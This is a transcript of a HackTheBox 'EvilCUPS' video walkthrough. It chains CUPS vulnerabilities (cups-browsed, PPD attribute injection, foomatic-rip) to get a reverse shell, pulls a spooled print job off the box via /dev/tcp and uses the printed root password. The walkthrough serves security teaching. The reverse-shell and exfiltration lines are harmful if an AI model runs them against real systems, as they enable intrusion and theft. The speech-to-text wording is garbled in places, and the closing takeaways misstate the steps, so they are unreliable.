HackTheBox - EvilCUPS

IppSec · Beginner · 🎯 Management & AI-Era Leadership · 1y ago

Key Takeaways

The video demonstrates how to exploit a vulnerability chain in CUPS (Common Unix Printing System) to gain remote code execution on a HackTheBox machine. The vulnerability is exploited using a combination of tools such as nmap, cups, and python.

Full Transcript

what's going on YouTube this is ipeg we're doing evil cups from hack the box which is a non-competitive release so we can do a video on it right away the box is based on all the work evil socket did finding a vulnerability in cups which is the main Linux print server and by default it listens on UDP Port 631 on all host and this caused it to get a very high CVSs score because anyone that could talk to that UDP socket could then create a printer on the host that would execute a command when something is printed to it however because it required someone uh something being printed many people online kind of dismissed the high CVSs score because printing just doesn't happen on Linux all that often there are ways to remotely trigger print jobs in this box we will use the cups management server that's listenting on TCP 631 to print a test page and give us a shell on the box with that shell we'll then View cast print jobs on the box and discover that someone printed the server's root password and recover that job view it and log into the box as root so with that being said let's just jump in as we're going to start off with the end map so- SC for default scripts SV numerate versions - VV for double verost this gives us things like the TTL OA outut all formats put the end map directory and call it evil cups and then the IP address of 1010 11.40 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and the banner tells us it's a Debian server we also have the internet printing protocol I listening on Port 631 TCP and the banner tells us it's cups version 2.4 and then we have some web scripts of nmap running that tells us there is a web server on this interface so let's go ahead and take a look at it so I'm going to go to my browser HTP 101014 631 and we get the cups management interface and now normally this isn't exposed to all interfaces it's normally just bound on the loopback or Local 
Host but on a lot of just appliances that also have print servers let say like sonology nazes it is Exposed on all interfaces because not many people are on the console of those like Appliance print server things so occasionally you do see it exposed to the internet I think if you search Showdown right now there'd be like 70,000 just on the open internet um if we Google the whole Banner of this 242 it will tell us like when this was released so I'm going to Google open printing cups 242 change log and we see it was um on Google it told us it was in 2022 um there's a fix for CVN 2022 but this page was published May 26 2022 and also if we look at the further here the copyright is telling us 2022 and that's normally a good indicator at the last time a code has changed on a web server um just this being open really isn't a huge vulnerability because there is authentication that um behind dangerous actions like if we go to admin we just get it forbidden sometimes it'll promp you for credentials which is just HTTP basic off you just log in with local uh credentials there's also a way to do curos things like that but we're just a Anonymous user right now the one thing Anonymous users can do is enumerate printers so if we go to the printers we can see there is one printer the location is the server room and if we click on it we can do show completed jobs and then we can see there is one job that has been completed um we can also click on this drop down and do like print a test page and then if we look at the show completed jobs we see there are now two jobs completed and since we did this as Anonymous user it is disclosing the information we can see Anonymous created the job and the job's name is test page we can't see anything about this job um this is going to be important later on in the box but if we want to do something like say like delete or modify it's probably going to just say forbidden because that's a admin functionality so let's go ahead and talk about the 
elephant in the room and that is the big cups want ility of this year 2024 that happened like a week ago right if we wanted to we could do pseudo n map D capital u uh 10 10 1140 and we have to specify Port 631 whenever I do UDP scans I like uh gaining multiple ports because um UDP doesn't have a good way to tell you if it's open or not so I like having a like control that I know this should respond closed this one's open so I know 631 UDP is is listening which is the case on a lot of just cups in general this is going to be a very old protocol but to explain it better let's go ahead and navigate to the um blog post talking about the vulnerability from the finder of this um we went to evil socket's blog I'm sure you could Google like evil socket attacking cups or something like that and You' get over to this page but um I would recommend reading this entire thing because he does do a good job explaining it I'm not going to because it is long and we're going to go over everything handson doing a demo exploiting it right it really boils down to these four cves and combined they get a CVSs score of like 9.8 or 9.9 from Red Hat um I think he does talk about it somewhere here let's see CV SS there we go it's a 9.9 from red hat but let's just talk about the cve the first cve is going to be cups browse D binds on UDP any and this one is kind of odd because this is needed for cups browse d right the old protocol um well the purpose of Cups brows D is to be able to show you printers on the network right and the really old way to do this like a decade ago 2011 2012 and things like that was the printer would send a UDP broadcast message to the network on like Port 631 CS brows D would pick that up it would read that U packet and then say okay I'm going to go to that printer to download download the PPD the postcript printer description file and that lets it print to it right um newer ways use things like aahi bonjour zeroc com um whatever you want to call like those new ways 
to discover things and what really changed was the client sends a multicast DNS message out to the network and then things respond to it so the client's asking hey are there n printers the printers respond to it and then it goes and downloads the PPD file whereas the cups browse d listening on Port 631 UDP is really for printers initiating that broadcast so kind of a small change there and the fix here if we went to um cups browse d uh GitHub I think we'll be able to see the actual fix commits relatively recently all it does is disables this by default because again you can't really patch this because it's needed to function right that's the whole purpose of this so if you go to this thing the default browse protocol all they're doing is Dev vating to only DNS SSD which I forget exactly what that stands for but that's going to be using like aahi zeroc conf bonjour I forget there other names people call those type of Discovery things but in the blog post it also recommends disabling those because they're relatively insecure so the first cve is just about cups brows D um the next two are very similar this is going to be lib cup filter and lib PPD this one is um reading data from a IP server the internet printing protocol it doesn't filter any um Bad characters or enough Bad characters so you can have like line breaks and add extra attributes the lib PPD this one is just when it writes attributes it doesn't have sanitization so we don't do sanitization on um getting variables into the system we don't get them uh do sanitization when we get them out of the system so you could do them either place and then this attack chain would be fixed so that's what that is and again we're probably going to go over these again as we start exploiting them and then the final one is going to be this fumatic rip this again is going to be like one of those needed uh functionalities it was a big thing back in like 2011 because there was a command injection and kind of the fix was um we're 
not going to use fumatic rip over the network or at least we won't allow you to specify fumatic rip over the network but if print drivers want to put it in the PPD file and be installed locally we'll let them because what fumatic grip is is it's like a universal converter right printers don't accept documents of everything I can't just send like a PDF or JPEG to a printer and have it print um generally it goes through some conversion I'll probably convert it to a postcript format and then send it to the printer so fumatic rip is the way that the program does this and it's probably easy to just Google um let's say what do I want to Google exactly to pull this up fumatic rip command line issues maybe and find an old issue or config on how it works fumatic rip let's see fumatic rip command line if I just Google this do we get anything no everything's super recent I don't want that so I'm going to pause the video real quick and we're going to get to a better page to Showcase what fumatic rip is okay so I did it on my host and I all I did was search fumatic rip command line GitHub and I was clicking around and I saw this one issue if we go to the issue it kind of talks about how to properly well I guess I shouldn't say properly configure but an example configuration we give fumatic rip command line and then they're doing some bunch of magic to do a pearl conversion before it sends to the printer so the whole purpose of this is essentially it runs system on the parameter so if we can inject this into a uh PPD file then we can just put any command we want here and then it's going to execute it when things are printed so if we go back to this um this kind of like a feature like that's no real fix to cups brows D because we need to listen on UDP any for us to actually use that Legacy protocol so the only real fix there is disabling CBS brows D these two actual vulnerabilities because um it's allowing us to inject things into the PPD by just inserting Bad characters and then 
this one I don't know exactly how you fix it because again you're controlling a parameter in a config file that is just system it's just a bad design right so um let's go ahead and go to exploit these I bet if we went to the cups page now so if we do cups um that's Apple cups Cups GitHub there is a security um advisory that has some source code that we could potentially use however I have found that the code didn't work that well um this is not it maybe it's in cups browse D the downside with this is there's a lot of just projects and a lot of code to go through to chain all these things together but I want to say cups brows D is where the security issue is right here so you can also read this this is what was reported and then there's source code here but this source code I had trouble getting it working just out of the box um like it had both tabs and spaces like copy and paste was bad there are other few small things so I have U put my copy on my GitHub repost if you just go to GitHub IPC and I called it evil cups you should be able to download this script so let's just clone this to a box and then we can run it so I'm going to go code copy this and we can get clone CD evil cups and then to run this we're going to have to install the IP server so I'm going to do a python 3-m vm. VM so we're going to create our virtual environment so we can install python libraries so VM bin activate um pip 3 install d r requirements. text and this will install the IP server right I just cat requirements. text you can see it so let's go ahead and quickly go over this code to see exactly how it works so if I go to evil cups. 
py I'm going to go down to main real quick so we can see everything um the public PC had three for argv I just added an argument for running a command by default it just ran a touch command this just lets us put the reverse shell and standard in so right here we're going to stand up our um internet printing protocol server this is a HTP server and it's going to handle all the attributes building the PPD file for the client um but first let's talk about the send browse D packet and I'm actually going to comment this out real quick so we're going to run the first uh thing first without starting up the IP server so we can just see um what the request looks like so the browse D packet this is going to be what tells the print server we're on the network and um it should print from us so what I'm going to do is run this exploit so we can do Python 3 evil cups it wants our um IP address first then we do 10 10 11 40 which is the target the command it's not going to matter CU um I commented things out so this code's not going to work I just want to show you um what the request looks like and every time you attempt to add the printer it's probably going to take about 30 seconds to get the request sometimes this is instantaneous I think it's not working because there's not DNS on the server and it's like timing out or something so we just got to wait the 30 seconds and while I wait I want to stand up a wire shark so we can look at the UDP packet on The Wire so it should happen in about 5 Seconds we'll see the target connected and then there we go so this is the HTTP packet that gets sent so what happened is we sent this UDP packet I think this is is this it hypertext did I not capture it that's weird let's see one two three four five I don't see any UDP here huh they have a filter not capturing UDP that's weird um so we sent a UDP packet and then the server processed it and inside that UDP packet was the following let's just go up to here um we sent the printer type of two 
the printer state of three then we told it hey this is where the printer exist and then we gave it the location the info and the model and then it goes and sends a post and says hey we want to um get all the attributes I'm trying to find exactly where it is it's not in the easiest to read format uh there we go request attributes all so that is cups reaching back to us to install things um also in this we have the um exact kernel version that is running on the server but yeah that's that so let's go ahead oh I know I didn't capture the UDP because I wasn't running wire shark when I sent the packet that's why um so let's just oh not Bluetooth uh stop yes let's go ton zero there we go so I'm going to uncomment or IP server so now we'll respond with actual printer attributes and the attributes we send are going to be all of this right so we use the python Library I server just so we can put it in the correct format because it is a serialized format I guess we can look at it in wi shark when it goes but these are going to be all the um variables and then at the very bottom we're going to send one called print more info and then this is where the cve come into play right so we talked about um these two cves of it not validating or sanitizing the attributes so we say hey we got to print more info and then we put a line break in and then we say hey here's this parameter and then this parameter right so we're just writing these lines directly into the post fix um file and that's where we inject our Command so after we get rout on the box we'll look at the PPD file and I'm assuming this will make much more sense um once you can see the config but this is where that CV comes into play so we start the line off with a single quote because we just want to insert a blank variable so what it's going to do is like um star print more info and then this is where we have our inject so we're going to put a single quote in then the line break and then we're going to just say now do the 
fumatic rip command line run bin bash and then we do cups filter or whatever uh Auto completes not fixing it C Filter 2 and then we do some stuff here and then leave that second um apostrophe open so when the um where is the program lib cups filter goes to read this variable it will go ahead and add this double quote and now this is the entire print more info thing that writes directly into the PPD file um I know that's probably not making much sense but hopefully it will in hindsight once we finish the video so let's get rid of all this stuff and run the exploit and I probably should have ran that first because it does take 30 seconds and the command we want to run is going to be a B- C bash d i um let's do I think this yeah like this and then Dev TCP 10148 9,10 And1 like that and then we can close these out I don't know if I got these quotes in the wrong order or not um I don't think it actually matters so we'll run this and we going to wait the 30 seconds and while we wait we can look at the packet we sent to the box right so this is the packet we sent the cups thing there's the type it's idle the URI location make a model and to understand all of this um you could just go to um any of like the cups rfc's and understand it so if we went to like op Source Apple cups browse D protocol I think this is how I found it let's go here uh maybe this spe browsing Yep this is it and this says how it works right so we have type one is a hex digit or first we should say this is the whole packet so we send the type then wsp which means wh space then the state then wh space then URI wh space location wh space info you get it right so type one and hex digit so that is why in my script when we send this where is it the send browse D packet um printer type's going to be two and then I have the colon X in my F string so this makes it X right and then the state is going to be three which I think is idle and that's why this one is just an asky right because the RFC didn't tell me to 
do Hex it really doesn't matter because um three is the same as three and hex it's not until we go after nine that things really differ but I just want to try to obey this then we have the URI so after that we put the URL and then the really weird thing is location info make model it says quoted string so that's why you see when I do printer location info model these are strings and quotes right so that is the packet um we should have had 30 seconds pass the target connected and we sent the payload so let's go ahead now and navigate back to 631 if we go to SL printers we see there is an extra printer this hacked one so let's go here let's stand up our reverse shell so NCL lvmp 901 and I'm going to do print test page we sent it and now it hit my fumatic rip command line that I sent and we got a shell because that's what um we told it to do is run code so let's now upgrade our shell so we'll do Python 3 import PTY PTY spawn Ben bash like that there we go s2y raw minus Echo foreground enter twice so now we have a reverse shell as the um LP user and let's export term equal x term so I can clear the screen so what can we do as this user well remember at the start of the video we talked about um there being two printers or this Canon and there was a completed job so what we want to do is figure out where this file is the easiest way to do that I found is just a standup cups myself you could also do a lot of Googling but if you um install cups it's probably already installed and then enable it so we'll do system CTL Cup start uh is it start cups yeah start cups wrong way and now I can go to my local host 631 and I have my own server here right so if I go to printers um I got my physical printer uh behind me I don't want to use that one though what I want to use is just one I make so I'm going to go back over to to um my command line and I'm going to run LP admin and then we can say I think it's- P for Destination that's going to be I think the Q name I'm going to call it 
the void - capital E is going to enable it right away and then DV is going to be the device URI I'm just going to say this device is uh devnull so anything we print to this just immediately goes into the void so now if I go back to this page we can see a new printer here and if I go to print a test page we have the void d8 if I do show completed jobs there it is so I'm going to switch to the root user of my box and then we could just do some forensics this is where kind of Googling helps um if we googled uh let's see cups cash print jobs maybe it tell us the directory you could probably just guess the directory if you understand Linux structure but Google tells us verse bu cups cach so let's do CD verse bu cups cach no follow directory that should exist oh yes it's just vers cups there's no cash there's also ver cash cups and if we do that then we could also look at the jobs cache so if we cut this job. we can see the um like metadata around that like the name the destination created but the actual print job is here and the format of this is a little bit weird it is D and then five digits and then three digits this is going to be the print job so if I go back to my print server this is print job 8 and then this is going to be the page so if we went back to a shell um looks like our shell died so the print job's only going to last so long and then um it'll kill the job and when it kills the job it will probably kill your shell with it so to fix that what we do is um a no hop so I'm going to go back to this and we're going to do no hop and then we do a space Amper sand at the end so this is going to automatically background it and it's going to take 30 seconds for to come back and there is some automation on the box itself to clean up bad printers so once it goes into um a bad State it's bad State being a paused state it will automatically delete the printer if you do this in the real world um you may have trouble and you may have to go at it at a different IP 
address because it's going to be just in a state that it won't accept a new PPD file and you won't be able to get code execution it's really odd so um keep that in mind we just put a new shell in let's do NC whoops I want to listen on 90001 there it is we can go back to this one printers the Hacked stand up my test page and we have this so if I do a ps- ef-- forest we can explain exactly what happened um let's see python 3C we have to upgrade a shell real quick and I'll probably do this again at the very end of the video um maybe let's see we did Python 3 St raw Echo foreground okay PS ef-- Forest let's do less capital S uh we have to export a term and I also need to get the size of my TTY rows 28 columns 1 10 Forest L S there we go so what happened this is going to be a print job this is the test page right fumatic rip runs a command we can see it's defunct here but this before was a reverse shell and this one spawned a new process so because we did no hop with the Ampersand This Is Us um we did not have this before it's hard to show unless we want to get a whole new shell without no hop before we are all under this one print job so when it killed this job because it just timed out it took her shell with it but now we have forked to a new parent PID which is just one with no hop um when it goes and kills this job it's not going to kill this one so when you're exploiting this that no hop uh definitely makes it a lot more stable so where were we we were looking at the cache right so we're going to go to verse bull cups so if I do CD verse bull cups then we do LS we can't permission denied and the reason why we can't is we only have the executable bit set on this directory um root owns it we're group LP it's only executable so that means we can go in the directory but not list the contents however if we look at the files inside of this we can see the D file is going to be readable by the lp user and this is the cache we want so we just have to know the file name so 
if we go back to um this we can see where is we have to go to the printer so the Canon show completed jobs we want job one so if I do cat D and then 4 Zer one and then we want page one we get the post fix and it's telling us the title of the page is p. text and giving us this string so chances are it's going to be um the password right but let's just copy this file back to a box and then um convert to PDF so we can actually view what the page looks like because this is in postcript format so I'm going to exit this and we can say NC lvmp 901 and I'll call this job. PS and then we can cat that file to Dev TCP 101048 901 now we have the file here and we can use a command called PS2 PDF and we can say job PS job. PDF if we open job. PDF we have the page that was printed so we got password. text and the password which is break glass root evil cups so the whole theory behind this is the admin is sitting at his desk and his Cube and he want wants to go log into a box physically because maybe like it's not responding he needs to log into the local terminal so what he did was just print the password to the server room printer grabs the piece of paper and then you can go log in right I've seen a lot of people do that back when I was an admin I even did that occasionally probably not the best practice in hindsight but um yeah so let's now use that password to log in so we can do su- or we could have sshed as root but we get logged in so now that we're root let's go and explore the Box a little bit more to understand what happened I know I said it would make more sense in hindsight so let's go to ety and then cups PPD and then let's look at that PPD file this is what we had sent right so if we look at it we have AP supplies and I think AP supplies is actually what print more info means it's just a single quote a double quote and then another double quote and this line is what we're sending right here this print more info somehow gets translated to AP supplies I'm not sure 
exactly why it does but it does um and then we put the double quote here so this one double quote right here is ours and then we put a line break in so we could write this next line which is the fu um fumatic rip command line and then we put our Command here and then we wrote the next line of Cups Filter 2 and then oh I guess we have a space we probably don't need that space or maybe maybe that's another CV that space is probably important um I'm guessing because this has a space this one will override this one I'm not actually positive I'm confused here um I guess we can try taking the space away and trying the exploit again let's see let's do that is that space needed so what I'm doing here is a PF Forest oh I'm root right now um let's see if I go back here okay the printer's probably gone um normally when this error comes at least on this box that's the printer reaching back we don't handle something and that's when the printer goes in the pause state so I'm thinking um it should be cleaned up yes I don't even have a PPD file here anymore so it automatically cleaned itself up if I run this command again and now we don't have the space here and let's see um we can leave print more info there that's fine um actually let's do I don't want to change two things let's just change one I don't know if that AP more supplies thing um would error if it's not a um string or integer I don't know exactly what that wants so let's just keep it simple run the script again we'll wait 30 seconds and then we'll see if we can get a shell um without that one space and I guess I should have um did this without no hop so you could look at what the psf force looks like um I guess we'll fail one more time and then show you that piece and then probably wrap up the video so we got another 8 seconds for this to reach back and then the printer will come so we see nothing here 30 seconds hits that DNS query times out and now we suddenly have this so if we look at get hacked um let's go to 
fumatic rips now this cup filter doesn't have a space let's see what happens here um let's go to the Hacked did I listen I did so let's go NC print test page it's sent and we still got a shell so I don't know exactly what that space is doing maybe that's just an error in the script but it doesn't appear to matter so I'm just going to do this again CU I think for some reason if you didn't do the upgrade to a shell um and it cleaned up the job it would not actually kill your shell it's really bizarre um whoa I don't want that um FG I went into a different teamu session did I close t-u completely there we go this is what I want stty raw minus Echo foreground there we go but I think because we do the proper shell when it kills the parent process like the process gets a thread kill message and then decides to exit itself if we don't do the proper shell maybe it gets that thread kill and says I don't know what to do and doesn't exit um can't really explain it didn't play with it that much but yeah so I'm just going to uh wait for this to air it's probably going to be 2 to three minutes so I'm going to pause the video and then we'll resume okay so it has errored um this shell did not die because we did use the no hop so let's go ahead and what we want to do is change this to not use no hup so we can see exactly what the um call tree looks like so we're going to do this bash again and then while we wait um it's going to take again 30 seconds what do we want to look at uh we can actually change this real quick let's do a one here or I can do please subscribe there we go so we going to put a field here to prove that we are writing this double quote right here so that's the purpose of that um oh shoot I don't know if this is going to work now because I had to restart the server before it actually to take that change let's see what happens um let's go back to the printer we can do a print test page unable to print the class does not exist so we definitely dorked something up 
Thankfully we have a root shell. The printer doesn't exist; /printers doesn't exist at all. So I think us putting that "please subscribe" caused it not to parse, not a huge surprise. So let's change this to just an integer and maybe that will work better; if not, then we'll give up trying to prove that that one double quote is ours. I guess maybe we could have done a space; a space is probably going to be a safe character as well. But yeah, let's just wait for these seconds to elapse. And now that I'm thinking about it, it may not be that; I think that space-colon matters, because I changed this and then I didn't restart the server, so the PPD file never updated. Oh, that is painful. That is probably what happened, so let's go back, and I probably have to clean this up. Oh, we got it, it's there. Sure, okay. Printers, sometimes they just work, right? We sent the job, we got this, everything's working. Okay, ignore that tangent.

Let's now quickly do the python3 -c 'import pty; pty.spawn("/bin/bash")', and we're going to look at the PPD file after this because I'm not exactly sure what just happened. stty raw -echo; fg, enter, enter, stty rows 28 cols 110, I think that's it, export TERM=xterm. Okay, so it's kind of wonky because these two, these are old ones, right? These are from my nohup; I'd have to exit the whole shell to get rid of those. But this is what the call trace of our print looks like, right? We have this "hacked", which is defunct; this is probably the sh executing foomatic-rip, and then it executes the reverse shell here, and we go down. So when this job gets cleaned up, this shell goes away. These two are from my nohups, so let's close this one, we don't need it anymore. This one, we want to look at the PPD file real quick. So if I look at this, let's go to foomatic. The space-colon doesn't seem to matter, and the APSupplies "please subscribe", that worked. So that proves that we wrote this one double quote, then put the line break and did everything right. So that's all good. Let's exit this quickly, and hopefully it hasn't been the 5 minutes for the cleanup to run, so we still have the shell. Awesome. Let's BF l- capital S, there we go. So this is what it normally looks like if you don't have any nohups, right? So as soon as it comes, it's going to go kill our shell.

Yeah, so hope you guys enjoyed the video. That's probably going to be it, I don't think there's anything else, so take care and I'll... oh, I guess one last thing. We can talk about this again, since we went over this at the beginning, but hopefully now that you have the background of the video it may make more sense, right? So this cups-browsed, the vulnerability is it's listening on all hosts on port 631, but it needs to, that's how it functions, right? This is a legacy protocol though, so you can disable this and nothing happens. You don't want to disable the whole cups-browsed itself, because while this is a legacy protocol, it listening on UDP 631 is legacy; now it defaults to DNS-SD. So if I go back to cups-browsed, look at the commits, not issues, commits; so slow, what's going on? Commits, I'm going way too fast, there we go: "default browsing protocol". So now when distros pull this source code and compile, it's not going to listen on 631 because "cups" is removed there, right? It's only using dnssd, which is the multicast DNS one. It's not perfect, but it will limit us from being able to attack it across the network, right? If we're still on the local network we can respond to that mDNS request and say hey, here's the URI for a printer, go download it, and get code execution, right? Well, as long as nothing else is patched, right? We can still make the CUPS server reach out to us to install a printer if we're on the local network, because we can respond to the multicast DNS request that Avahi or Bonjour would send. So that's what cups-browsed is.

libcupsfilters: this is when our IPP server sends our printer attributes; we can put a line break and it doesn't sanitize it, so we can put some attributes in the file that it doesn't expect. This one: when it writes that file, it doesn't do sanitization, so this actually makes it into the file that goes on disk. And this one is just FoomaticRIPCommandLine accepts an argument and then runs system() against that to run the command, so that's just dangerous. The whole report is talking about, like, how bad the experience was reporting this, and I kind of get it from both sides, right? This is going to be one of those normal situations where a lot of people don't know how to fix the vulnerability when it's vulnerable by design. There wasn't really, like, a memory corruption or something that they could fix in the source code, right? This is just bad design in the filter and cups-browsed. So I can see why, like, developers will kind of drag their feet if they don't fully understand security, because they're just like, how do I fix this? I can't. It's vulnerable by design; we have to get rid of it or something. So they get rid of this one, and then, like, well, we can't get rid of FoomaticRIPCommandLine because so many printers use it; if we do, no one will be able to print. So we're kind of screwed, right? It's one of those just odd scenarios that happens quite a bit when you do pen testing: the security people always just say, well, it should be fixed, if it's not fixed then we can run code; that's like, what are you doing? And then the devs are like, I don't know how to fix it. It's a bad situation to get into, but hopefully that kind of shed some light on why, like, Twitter may have been, like, negative around this entire thing.

The other thing is many people say that people have to print to the printer in order to execute it, but as we've shown here, there are other ways to trigger print jobs. You can use your imagination; I know there's other ways I could exploit it where, if I didn't have access to this, if this was just listening on localhost, there may be a way to interact with the page still, maybe like cross-site scripting. So it's no longer completely void of any user interaction, but if they click on a malicious link, then you can send them the print driver, then have their browser go to localhost and print the test page that way and get code execution. There's just a big attack surface here. So with all that being said, I'm going to wrap the video up. Take care all, and I'll see you all next time.
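The three things the video keeps coming back to, from the defender's side, as an added example that is not from the video, from CUPS or from cups-browsed: a model of the attribute sanitization libcupsfilters lacked (an IPP string with a line break becomes a new PPD keyword line), an audit of the PPD keywords that decide what command foomatic-rip runs, a check that cups-browsed.conf no longer enables the legacy "cups" (UDP 631) browsing protocol, and a parser for the d<job>-<page> spool file names. The sample PPD and config strings are constructed for the example; the function names are my own.

```python
import re

# Constructed sample PPD, not a real printer's file: it carries the two
# keywords the video walks through. foomatic-rip hands FoomaticRIPCommandLine
# to system(), and cupsFilter2 is what routes a job through foomatic-rip.
SAMPLE_PPD = """*PPD-Adobe: "4.3"
*ModelName: "Generic PostScript (constructed sample)"
*APSupplies: "http://printer.example.invalid/supplies"
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dSAFER -sDEVICE=ps2write -sOutputFile=- -"
"""

PPD_KEY_RE = re.compile(
    r'^\*(?P<key>FoomaticRIPCommandLine|cupsFilter2?):\s*"(?P<val>[^"]*)"', re.M)
CONTROL_RE = re.compile(r"[\x00-\x1f]")
BROWSE_RE = re.compile(r"^\s*(Browse(?:Remote)?Protocols)\s+(.*)$", re.M | re.I)
SPOOL_RE = re.compile(r"^d(\d{5})-(\d{3})$")


def ipp_string_is_safe(value: str) -> bool:
    """Model of the check libcupsfilters lacked: an IPP attribute value that
    carries a line break becomes a fresh *Keyword line once it is written
    into the generated PPD, so reject any control character."""
    return CONTROL_RE.search(value) is None


def audit_ppd(ppd_text: str) -> "list[tuple[str, str]]":
    """List every (keyword, value) pair in a PPD that influences which
    command runs for a job; each one deserves a look on a server you defend."""
    return [(m.group("key"), m.group("val")) for m in PPD_KEY_RE.finditer(ppd_text)]


def legacy_browsing_enabled(conf_text: str) -> bool:
    """True if cups-browsed.conf still lists the legacy 'cups' protocol (the
    UDP 631 listener) for browsing; 'dnssd' alone keeps it to the local link."""
    return any("cups" in m.group(2).lower().split()
               for m in BROWSE_RE.finditer(conf_text))


def spool_job(filename: str) -> "tuple[int, int] | None":
    """Split a retained spool file name (d<5-digit job>-<3-digit page>) into
    (job id, page number); anything else in /var/spool/cups is not a job page."""
    m = SPOOL_RE.match(filename)
    return (int(m.group(1)), int(m.group(2))) if m else None


if __name__ == "__main__":
    for key, val in audit_ppd(SAMPLE_PPD):
        print(f"{key}: {val}")
    print("legacy cups browsing:", legacy_browsing_enabled("BrowseRemoteProtocols dnssd cups\n"))
    print("spool d00003-001 ->", spool_job("d00003-001"))
```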

Original Description

00:00 - Introduction
01:00 - Start of nmap
01:45 - Examining the CUPS Management Interface on TCP Port 631
04:40 - EvilSocket's blog, explaining the four CVEs and how they are utilized in our attack chain
11:00 - Showing the GHSA Advisory that had the initial POC that I had trouble getting working
14:50 - Talking about the Cups-Browsed packet (UDP) we send, which causes CUPS to make an HTTP/IPP Request to our server to install the printer
16:00 - Talking about the attributes we send, and where the exploit begins. We will inject an extra attribute in the print-more-info attribute
18:15 - Running the exploit to send us a reverse shell, talking about the cups browsed packet while we wait
20:45 - Going back to the CUPS Management Page and we can see a new printer, printing a test page to get a shell on the box
21:35 - Showing there was a print job we didn't create, starting CUPS locally so we can see how CUPS Stores print jobs
23:15 - Seeing cups stores our jobs in /var/spool/cups/d(5 digit print job)-(3 digit page num).
24:25 - Going back to our shell, discovering it got killed, getting another shell with nohup so we fork out of the process
27:30 - Having trouble reading the cached print job because we don't have read permission on /var/spool/cups, but we do have execute so we can go into the directory and read files that we have access to
28:40 - Converting the PostScript file to pdf so we can see the page that was printed and get the root password
30:00 - Showing what a PPD File looks like
39:10 - Going over all the CVEs again to summarize what we did


This video teaches how to exploit a vulnerability in the CUPS protocol to gain remote code execution on a HackTheBox challenge box. The vulnerability is exploited using a combination of tools such as nmap, cups, and python. The video covers topics such as print job exploitation, remote code execution, and legacy protocols.

Key Takeaways
  1. Map the box using nmap to identify open ports
  2. Connect to the box using SSH on Port 22
  3. Access the CUPS management interface on Port 631 TCP
  4. Enumerate printers and view completed jobs
  5. Create a print job as an anonymous user
  6. Exploit the CUPS vulnerability using python and cups
  7. Gain remote code execution on the box
